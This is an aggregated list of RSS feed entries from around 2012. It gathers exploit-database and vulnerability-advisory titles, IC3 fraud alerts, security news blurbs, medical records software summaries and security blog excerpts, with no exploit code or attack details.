==> dos / - Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability

http://www.1337day.com/rss

==> local - JPEGsnoop 1.5.2 <= WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> local - Hardcoreview WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - InduSoft Web Studio Arbitrary Upload Remote Code Execution Vulnerability

http://www.1337day.com/rss

==> web - Fantastico Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Censura XSS/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - ProjectPier 0.8.8 Shell Upload

http://www.1337day.com/rss

==> web - TP-LINK TD-W8151N Cross Site Request Forgery

http://www.1337day.com/rss

==> web - Small-CMS 1.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - MS11-080 AfdJoinLeaf Privilege Escalation

http://www.1337day.com/rss

==> remote - Dart Communications Stack Overflow Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Plugin spider calendar Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Diy21 CMS v3.10 (product.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Hiro Player 1.6.0 (.mp3) Local Crash PoC

http://www.1337day.com/rss

==> local - NCMedia Sound Editor Pro v7.5.1 SEH&DEP

http://www.1337day.com/rss

==> web - EasyFeeds CSRF/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - phptax 0.8 <= Remote Code Execution Vulnerability

http://www.1337day.com/rss

==> Leading Indian banking portals contain glaring security lapses

http://feeds.pheedo.com/tt/1323 Even as Internet banking portals transform the way Indians bank, vulnerabilities exist in banking websites like SBI, Citibank India, HDFC Bank and ICICI Bank. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> MiniFlame spyware extremely targeted, but could pose future threat

http://feeds.pheedo.com/tt/1323 MiniFlame is highly specific espionage malware, but experts indicate that financially motivated cybercriminals could make the threat more widespread. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Web app design at the core of coding weaknesses, attacks, says expert

http://feeds.pheedo.com/tt/1323 When addressing Web application threats and vulnerabilities, security teams need to look out for design flaws, says Mike Shema of Qualys, Inc. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> How to comply with updated NIST incident response guidelines

http://feeds.pheedo.com/tt/1323 NIST recently updated its incident response guidelines. Find out how to comply with these changes and incorporate them into an incident response plan. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tips to overcome information rights management implementation challenges

http://feeds.pheedo.com/tt/1323 Information rights management provides foolproof protection for information, but lack of awareness in India often prevents successful IRM implementation. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Airtel's ISO 27001 certification tale: Benefits, challenges & lessons

http://feeds.pheedo.com/tt/1323 Leading Indian telecom player Bharti Airtels ISO 27001implementation is one of the largest in the world. Join us, as we take a peek under the hood. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Vulnerabilities in JavaScript: Secure coding insights and tips

http://feeds.pheedo.com/tt/1323 JavaScript vulnerabilities are on the rise in India with the entry of HTML5 and faster JavaScript engines. Here are some key problem areas along with antidotes. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Paladion

http://feeds.pheedo.com/tt/1323 Paladion Networks is a Bengaluru, India-based provider of information security products and services. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Age-old vulnerabilities, attack techniques consistently trip enterprises

http://feeds.pheedo.com/tt/1323 Windows security has improved, but longstanding Unix and network vulnerabilities remain an easy target for determined attackers. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Adobe to revoke certificate following fraudulent use

http://feeds.pheedo.com/tt/1323 Malicious utilities were created using the fraudulent certificates to appear to be valid Adobe products running on Windows systems. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Some activist DDoS attacks growing in sophistication, expert says

http://feeds.pheedo.com/tt/1323 Most distributed denial-of-service attacks are easily filtered out, but individuals with the technical skills can mirror legitimate traffic. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Research firm discovers new Java sandbox vulnerability

http://feeds.pheedo.com/tt/1323 A Java sandbox flaw could allow malicious code to run on any system running Java 5, 6, or 7. Users are advised to disable the Java browser plugin. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Targeted attackers often gain upper hand once inside, says Trend Micro

http://feeds.pheedo.com/tt/1323 Once inside, skilled attackers can scout for exploitable flaws and set up private communication channels to support cyberespionage campaigns. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Limitations of two factor authentication (2FA) technology

http://feeds.pheedo.com/tt/1323 The common two factor authentication (2FA) techniques used In India have several shortfalls. We take a look at security risks associated with 2FA solutions. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> ESET calls Flashback Trojan threat now 'extinct'

http://feeds.pheedo.com/tt/1323 ESET reports on how the Flashback Trojan changed the relationship between Apple and Java. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Three cybercrime myths and how to counter such risks

http://feeds.pheedo.com/tt/1323 Cybercrime risks and threats are now common in India. We dispel common myths and offer measures to help counter any such issues that you might face. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Smartphone Malware Safety Tips

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (September 19, 2012)

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud

http://www.ic3.gov/rss/news.xml

==> Lawyers' Identities Being Used For Fake Websites and Solicitations

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (August 08, 2012)

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Delivers Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (May 23, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 2011 Annual Report on Internet Crime Released

http://www.ic3.gov/rss/news.xml

==> Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (April 20, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (March 27, 2012)

http://www.ic3.gov/rss/news.xml

==> U.S. Law Firms Continue to be the Target of a Counterfeit Check Scheme

http://www.ic3.gov/rss/news.xml

==> Justice Department and FBI Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> New Variation on Telephone Collection Scam Related to Delinquent Payday Loans

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (February 17, 2012)

http://www.ic3.gov/rss/news.xml

==> Timeshare Marketing Scams

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Involving E-mail Intrusions to Facilitate Wire Transfers Overseas

http://www.ic3.gov/rss/news.xml

==> Joint FBI and DHS Public Service Announcement: Best Practices For Recovery From the Malicious Erasure of Files

http://www.ic3.gov/rss/news.xml

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 38 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 38 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1590: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1587: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1528: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and ' Insomnia Security' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1513: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1512: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1511: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1501: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1468: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2011-12-22, 281 days ago. The vendor is given until 2012-06-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1480: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'gwslabs.com' was reported to the affected vendor on: 2011-12-19, 284 days ago. The vendor is given until 2012-06-16 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1385: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'aazubel' was reported to the affected vendor on: 2011-11-29, 304 days ago. The vendor is given until 2012-05-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1437: Honeywell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-23, 310 days ago. The vendor is given until 2012-05-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1429: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'ptzool' was reported to the affected vendor on: 2011-11-04, 329 days ago. The vendor is given until 2012-05-02 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1322: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrzej Dyjak' was reported to the affected vendor on: 2011-10-28, 336 days ago. The vendor is given until 2012-04-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1383: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1350: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1347: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1191: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Dan Rosenberg of Virtual Security Research' and 'Damian Put' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1329: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2011-08-12, 413 days ago. The vendor is given until 2012-02-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Webroot SecureAnywhere 2013 adds protection for Mac OS X

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Webroot SecureAnywhere 2013 is here. The new security suite from Webroot includes a variety of updates in the areas of performance, and the overall user experience. But, the most notable feature of SecureAnywhere 2013 is that it now also protects Mac OS X. Lets start with a look at SecureAnywhere in general. While the overall goal of the software is the same as competing antimalware and security suites, and it seems logical to compare them, SecureAnywhere is a whole new approach. Webroot completely threw out its flagship products, and started over by building SecureAnywhere around a more proactive philosophy based off the acquisition of Prevx. Webroot logoWebroot SecureAnywhere is a whole different approach to defending against malware. The result is protection for your PCs and mobile devices that delivers blazing performance, and has virtually no impact on system resources compared with the traditional approach of rival products. The entire install occupies a mere 750KBwith a Kon your hard drive. It installs in seconds, and according to metrics from Webroot, the software uses 91 percent less memory than competitors, and completes full system scans in about a minute116 times faster than average antimalware scans. SecureAnywhere is a comprehensive security suite that includes a built-in firewall (only in Webroot SecureAnywhere Complete 2013), identity and privacy protection, social network protection, and seven specialized security shieldsthree of which are new to SecureAnywhere 2013. The USB Shield blocks attacks and malware from removable drives, the Offline Shield protects the system against persistent threats even when its not connected to the Internet, and the Zero Day Shield identifies new or changing threats to defend against emerging attacks. One of the benefits of SecureAnywhere is that its a single security solution that can protect multiple platforms, including PCs, as well as iOS and Android mobile devices. The biggest improvement in SecureAnywhere 2013, though, is the addition of Mac OS X as a supported platform. Mac OS X has benefited for years from security by obscurity, but it has gained enough market share to capture the attention of attackers. Many Mac users are nave when it comes to malware and online threats, and make the mistake of assuming Mac OS X is somehow inherently invulnerable. Attacks like MacDefender, and the Flashback Trojan were a wakeup call, though, and more users are starting to realize that their Mac needs protection, and SecureAnywhere is a solid option. Users who invest in SecureAnywhere Complete 2013 also get the benefit of online backup and file syncing. Webroot provides 25GB of cloud-based storage, protected with strong encryption. Files can be securely stored and synced across devices, so data from a PC or Mac can be accessed from another PC or Mac, or even from an iOS or Android mobile device. Webroot SecureAnywhere 2013 is available now, starting at $39.99.

==> License Plate Frame Foils Irksome Traffic-Light Cameras

http://feeds.wired.com/wired27b Traffic-light tickets have ticked off a gazillion drivers, some of whom have had to fork over $500 for running a light. Now theres a way for you to throw a monkey wrench into that money-making machine.

==> Inside the Mansion—and Mind— of Kim Dotcom, the Most Wanted Man on the Net

http://feeds.wired.com/wired27b Please Choose One of the Following Statements: A. Kim Dotcom is not a pirate. Hes a hero. The savior of my online liberties. A visionary digital entrepreneur. His company Megaupload was a legitimate data-storage business used by hundreds of millions ...

==> Megaupload Is Dead. Long Live Mega!

http://feeds.wired.com/wired27b Megaupload's takedown by the U.S. government spurs Kim DotCom to build a filesharing replacement that relies on encryption so owners can't be blamed for knowing that copyright infringing files are on company servers. That, DotCom thinks, will probably keep the ...

==> Hacker Fight: Everything You’ve Been Told About Passwords Is Wrong

http://feeds.wired.com/wired27b As someone who has studied millions of passwords and how they were constructed Ive spent most of my waking hours for over a decade obsessing about authentication methods I say we can have both security and practicality. But ...

==> Russian Anti-Virus Firm Plans Secure Operating System to Combat Stuxnet

http://feeds.wired.com/wired27b Russian anti-virus firm Kaspersky Lab announced on Tuesday that it plans to develop a secure operating system for use with critical infrastructure systems, but a security expert says the chance of such a system being adopted is a longshot.

==> Pentagon Hacker McKinnon Wins 10-Year Extradition Battle

http://feeds.wired.com/wired27b Accused British hacker Gary McKinnon has won his ten-year battle to resist extradition to the U.S. on charges that he hacked Pentagon computers in the U.S.

==> As Drone Debate Rages, Police Move on to Million-Dollar Spy Planes

http://feeds.wired.com/wired27b Drones? Who needs stinking drones when you have an all-seeing manned plane? That seems to be what Texas and other border states are thinking with multi-million dollar purchases of high-tech spy planes.

==> Who Bought Your Politician? Check With Our Embeddable Widget

http://feeds.wired.com/wired27b Ask any politician whether campaign contributions influence their decisions, and they'll tell you certainly not. Ask anybody else whose nose isn't growing, and they'll give the opposite answer. With that in mind, we at Wired are introducing a web-based embeddable ...

==> State-Sponsored Malware ‘Flame’ Has Smaller, More Devious Cousin

http://feeds.wired.com/wired27b Researchers have uncovered new nation-state espionage malware with ties to two previous espionage tools known as Flame and Gauss, and that appears to be a "high-precision, surgical attack tool" targeting victims in Lebanon, Iran and elsewhere.

==> Task Force Tells DHS to Offer ‘Cool’ Cybersecurity Jobs to Gov. Workers and Test Them Like Pilots

http://feeds.wired.com/wired27b In order to attract the highly skilled and qualified cybersecurity workers the Department of Homeland Security needs to fulfill its mission of protecting government computer systems and overseeing the security of critical infrastructure systems, DHS has to reserve its coolest ...

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practices server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditabs Intelligent Medical Software (IMS) combine features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthys NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an offices current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKessons Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Googles Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEyecreated has caused them to backpeddlequite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know. I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even thoughit wasn’t a far fall -a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start upagain by calling out this completelyuseless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled; “Share –Or Keep Getting Pwned” Sigh. Clearly zero research was done in to this posting as there really is a lot of [...]

==> Week 41 in Review – 2012

http://infosecevents.net/feed/ Event Related Hack In The Box Hack In The Box 2012 – conference.hackinthebox.org Index for Hack In the Box 2012 materials. Hack In The Box: researcher reveals ease of Huawei router access – zdnet.com At Hack In The Box researcher Felix “FX” Lindner has shown how Huawei routers are easy to access with their static [...]

==> Week 40 in Review – 2012

